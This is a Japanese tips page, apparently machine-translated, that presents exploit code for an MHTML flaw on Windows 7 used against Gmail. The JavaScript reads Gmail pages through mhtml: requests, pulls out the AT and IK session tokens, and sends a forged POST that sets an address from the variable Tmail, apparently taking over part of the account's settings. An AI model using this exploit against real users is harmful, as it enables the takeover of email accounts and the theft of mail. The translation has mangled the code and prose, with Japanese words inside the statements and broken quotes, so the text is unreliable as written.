Windows system >> Windowsの知識 >  >> Windows 7システムチュートリアル >> Win7システムの基本 >> WIN7 GMAIL MHTMLの脆弱性悪用コードのセクション

WIN7 GMAIL MHTMLの脆弱性悪用コードのセクション

  

Win 7 GMAIL MHtmlの脆弱性テストコードになって久しぶりの更新ブログ、 - 最後に完成したバージョンはどこを失うべきかわからない - - ! - XPが直接HTTPプロトコルを要求するのとは異なり、AJax要求を開始するための Win7の下でのP> MHtmlの脆弱性、要求されたURLもMHtmlプロトコルにある必要があります。 XPは厳密?誰かがこの詳細に気付いたかどうか私は知りません。

関連機関CSRFでGMAILを攻撃するには、ATとIKのパラメータを有効にする必要がありますもちろん、COOKIEから、または直接ページから取得できる2つのパラメータを取得する方法はたくさんあります。次のコードはページから直接取得されます。

xmlHttp = new ActiveXObject( "Microsoft.XMLHttp");
XMLHttp.open( "GET"、 "mHtml:https://mail.google.com/mail/h/0/"、 True);
XMLHttp.send();

XMLHttp.onreadystatechange = function(){
if(XMLHttp.readyState == 4){
if(XMLHttp.status == 200) ){
REX = /href=\\".*?at=(.{34})\\">/.exec(XMLHttp.responseText);
AThash = RegExp。$ 1;
XMLHttp。開く( "GET"、 "mHtml:https://mail.google.com/mail/"; true);
XMLHttp.send();
XMLHttp.onreadystatechange = function(){
if (XMLHttp.readyState == 4){
if(XMLHttp.status == 200){
REX = /GLOBALS=\\[.*?,"(.{10})",/.exec(XMLHttp .responseText); IKhash = RegExp。1; XMLHttp.open( "POST"、 "mHtml:https://mail.google.com/mail/?ui = 2" + "& ik = "+ IKhash +"& vIEw = mdlg& at = "+ AThash、true);" XMLHttp.setRequestHeader( "Content-Type"、 "application /x-www-form-urlencoded");
XMLHttp。送信( "mdrp = 1& mda =%0D%0A" + Tmail + "%0D%0A");
}
}
}
}
}
}
}

Copyright © Windowsの知識 All Rights Reserved